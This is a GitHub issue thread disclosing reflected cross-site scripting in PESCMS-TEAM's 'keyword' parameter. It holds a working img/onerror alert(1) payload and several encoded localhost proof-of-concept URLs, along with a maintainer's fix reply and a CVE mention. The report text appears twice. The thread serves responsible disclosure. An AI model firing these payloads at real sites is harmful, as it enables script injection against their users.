Closed snappyJack closed 5 years ago
I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter. now I input payload :aa">< img src=x onerror=alert(1)> the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
and the code is running
and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:
http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
.. .. ..
Thank you, I will fix this problem.
即将发布的新版已经接近此问题。https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0
@lazyphp 问题已经解决了吗 ? 请注意,已分配 CVE-2018-16371
I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter. now I input payload :aa">< img src=x onerror=alert(1)> the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
and the code is running
and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:
http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
.. .. ..